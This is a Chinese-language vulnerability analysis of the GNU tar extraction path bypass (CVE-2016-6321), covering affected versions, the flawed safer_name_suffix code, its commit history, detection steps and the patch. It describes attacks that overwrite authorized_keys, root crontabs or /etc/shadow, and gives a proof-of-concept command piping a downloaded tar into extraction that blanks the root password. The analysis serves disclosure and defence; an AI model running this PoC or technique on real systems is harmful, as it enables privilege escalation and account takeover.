GNU tar 解压路径绕过漏洞(CVE-2016-6321) 分析
Author: LG (知道创宇404安全实验室)
漏洞简介
GNU tar文档管理命令是linux系统下常用的一个打包、压缩的命令。经CSS(FSC1V Cyber Security Services)团队的研究员Harry Sintonen研究发现,tar命令在提取路径时能够被绕过导致在某些情况下文件被覆盖。在一些特定的场景下,利用此漏洞甚至可导致远程代码执行。
漏洞影响范围
从GNU tar 1.14 to 1.29 (包含1.29) 影响包括Red Hat,Alphine Linux,Red Star OS以及其他所有使用GNU tar的Linux系统。
漏洞细节
攻击者利用该漏洞,构造一个特殊的tar包。当受害者使用tar命令解压时,受害者指定的目标路径可被绕过,tar包内的文件与目录就被解压到攻击者指定的位置。
具体攻击场景
以下为漏洞发现者提供的实际攻击场景 :
1.攻击者可以用这种手段诱使用户替换一些重要的文件,例如 .ssh/authorized_keys , .bashrc , .bash_logout , .profile , .subversion
或 .anyconnect
user@host:~$ dpkg --fsys-tarfile evil.deb | tar -xf -
--wildcards 'blurf*'
tar: Removing leading `blurf/../' from member names
user@host:~$ cat .ssh/authorized_keys
ssh-rsa AAAAB3...nU= mrrobot@fsociety
user@host:~$
2.有一些从web应用或者其它类似来源自动解压文件的脚本,这些脚本一般会以setuid root权限执行,通常这类脚本的解压命令如下:
#tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc
在这种情况下,攻击者可以重写 /var/spoon/cron/crontabs/root 以获取root身份的代码执行能力; 也可以将可能被root身份执行的二进制文件替换成一个有后门的版本; 或者投放一个setuid root的二进制文件,等待被管理员执行,使攻击者有机会获取root权限。
3.以root身份执行解压命令也可能被攻击 。例如上文中提到覆写/etc/shadow的例子
如果--exclude规则与--anchored选项同时使用,那么即使手动加了--exclude规则也没有用,例如:
tar -C / -xvf tar-poc.tar --anchored --exclude etc/shadow
在两种情况下,攻击者都成功地把/etc/test替换成了任意内容。
不过,在实际利用这个漏洞时,攻击者需要首先知道一些特定的前导信息,例如解压命令执行时实际在命令行下指定的路径名,毕竟在构造攻击tar包时“../”序列之前的路径前缀需要符合tar命令中所输入的路径,攻击才能奏效。
代码分析
根据漏洞发现者的分析,在lib/paxnames.c文件中,有一个safer_name_suffix()函数,这个函数取代了1.13版本的检查机制。
/* Return a safer suffix of FILE_NAME, or "." if it has no safer
suffix. Check for fully specified file names and other atrocities.
Warn the user if we do not return NAME. If LINK_TARGET is 1,
FILE_NAME is the target of a hard link, not a member name.
If ABSOLUTE_NAMES is 0, strip filesystem prefix from the file name. */
char *
safer_name_suffix (char const *file_name, bool link_target,
bool absolute_names)
{
char const *p;
if (absolute_names)
p = file_name;
else
{
/* Skip file system prefixes, leading file name components that contain
"..", and leading slashes. */
size_t prefix_len = FILE_SYSTEM_PREFIX_LEN (file_name);
for (p = file_name + prefix_len; *p; )
{
if (p[0] == '.' && p[1] == '.' && (ISSLASH (p[2]) || !p[2]))
prefix_len = p + 2 - file_name;
do
{
char c = *p++;
if (ISSLASH (c))
break;
}
while (*p);
}
for (p = file_name + prefix_len; ISSLASH (*p); p++)
continue;
prefix_len = p - file_name;
if (prefix_len)
{
const char *prefix;
if (hash_string_insert_prefix (&prefix_table[link_target], file_name,
prefix_len, &prefix))
{
static char const *const diagnostic[] =
{
N_("Removing leading `%s' from member names"),
N_("Removing leading `%s' from hard link targets")
};
WARN ((0, 0, _(diagnostic[link_target]), prefix));
}
}
}
//...
return p ;
从代码注释可以看出,如果absolute_names
变量为1,将file_name
赋值给p继续.反之若为0则将文件名中文件系统的前缀给去掉,并且也会对file_name进行一些安全检查 。
因此,当tar解包时若文件名中包含“../”,safer_name_suffix
函数会删除"../"及其之前的部分,将其与解压目录路径变为相对关系。这么做的目的是在兼顾文件名的安全性时保证文件的提取,而不是之前版本中改动的跳过含有恶意文件名的文件。在经过长达13年的应用后,这个漏洞终于被Harry Sintonen发现并公布出来。
于是,笔者研究了这个漏洞相关的发展历史。 tar所有版本下载链接 发现:
- tar通过src/extarct.c提取文件
- extract.c Revision 1.35前未加入安全检测,可以通过“../”字符串直接绕过解压路径问题,并将文件写到任意位置
- extract.c Revision 1.35加入安全检测,会警告压缩文件文件名中存在“..”字符串,并且会跳过不去处理这些文件
- extract.c Revision 1.47引入safernamesuffix函数
- tar 1.16版本后,extract.c文件代码重构,在lib/paxnames.c文件中定义
safer_name_suffix
函数
然后笔者继续深入,通过tar官网extract.c文件更新列表对比,从源代码分析tar的安全检测行为。
1999/12/13 commit 前后对比
Revision 1.35官方tag中有一条:
++(extract_archive): By default, warn about ".." in member names, and skip
them.++
即Revision 1.35加入了(extract_archive):默认情况下,在成员名称中警告“..”,并跳过它们
上图中,绿色代码区的功能就填补了之前安全检测的空白。它首先遍历CURRENT_FILE_NAME
,如果存在".."就会警告"Member name contains`..'",然后跳过这些文件,不去处理它们。而左边的灰色空白区域表明之前的版本缺少安全检测,"../"字符串就能绕过解压路径将文件写到任意位置。
2003/07/05 commit 前后对比
在Revision 1.47官方tag中:
++(extract_archive): Use safer_name_suffix rather than rolling our own.++
这就是漏洞初始出现的位置了。
通过代码对比我们可以看到,更新的版本使用safer_name_suffix
函数来替代了开发者自己写的规则。
漏洞检测方法
方法一:漏洞发现者给出了示例PoC,用户可用其自检。 (该方法会覆盖用户帐号密码,导致root用户密码为空,建议使用实验环境测试或者采用方法二)
curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd
cat etc/shadow
示例poc
示例poc中含有一个文件shadow,路径为etc/motd/../etc/shadow。在根目录下解压该包,由于漏洞的影响,"../"前面的内容给去掉了,路径文件名只剩下etc/shadow,原有etc/shadow文件就被其覆盖了。
方法二: 访问https://sintonen.fi/advisories/tar-poc.tar 下载测试tar包后在提取前重命名tar包内shadow文件名,如重命名为test。然后运行如下命令: sudo -s tar -C / -xvf tar-poc.tar etc/motd
查看etc目录下,若生成了test文件,证明漏洞存在。
漏洞修复补丁
官方补丁地址 GNU tar修复了该漏洞,将安全检测机制重新替换回了extract.c Revision 1.35的规则。
漏洞利用分析
在实际场景中,此漏洞的利用条件比较苛刻。
参考链接
[1]https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842339
[2]https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt
[3]https://sintonen.fi/advisories/tar-extract-pathname-bypass.patch
[4]https://www.gnu.org/software/tar/
[5]http://cvs.savannah.gnu.org/viewvc/tar/tar/src/extract.c?view=log&pathrev=release115_1#rev1.47
- 字符串hash入门
- R语言数据处理——数据合并与追加
- python爬取链家租房之获取房屋页面的详细信息(房名,地址,房价,面积,url)
- 信用卡“坏账”客户分析(二)
- Mac上提升python运算速度-PyPy初体验
- python处理json数据(复杂的json转化成嵌套字典并处理)
- Pointer-network理论及tensorflow实战
- python3 log文件处理获取某天需要的数据
- 实战深度强化学习DQN-理论和实践
- Python 工匠:编写条件分支代码的技巧
- python3 下 Zabbix监控调用graph.get并且下载监控图
- 用R语言复盘美国总统大选结果~
- 最新Apache Spark平台的NLP库,助你轻松搞定自然语言处理任务
- 使用Seq2Seq+attention实现简单的Chatbot
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 2017年天梯赛全国总决赛题集 L2-1 点赞狂魔
- 2017年天梯赛全国总决赛题集 L1-4 稳赢
- 2017年天梯赛全国总决赛题集 L1-8 矩阵A乘以B
- 你真的了解synchronized吗?
- 2017年天梯赛大区赛题集 7-1 出生年
- 2017年天梯赛大区赛题集 7-9 人以群分
- 浙大版《C语言程序设计(第3版)》题目集 练习2-1 Programming in C is fun!
- 浙大版《C语言程序设计(第3版)》题目集 练习2-3 输出倒三角图案
- 这款网络排查工具,堪称神器!
- 浙大版《C语言程序设计(第3版)》题目集 练习2-4 温度转换
- 浙大版《C语言程序设计(第3版)》题目集 练习2-6 计算物体自由下落的距离
- 浙大版《C语言程序设计(第3版)》题目集 练习2-8 计算摄氏温度
- 浙大版《C语言程序设计(第3版)》题目集 练习2-9 整数四则运算
- 浙大版《C语言程序设计(第3版)》题目集 练习2-10 计算分段函数[1]
- 浙大版《C语言程序设计(第3版)》题目集 练习2-11 计算分段函数[2]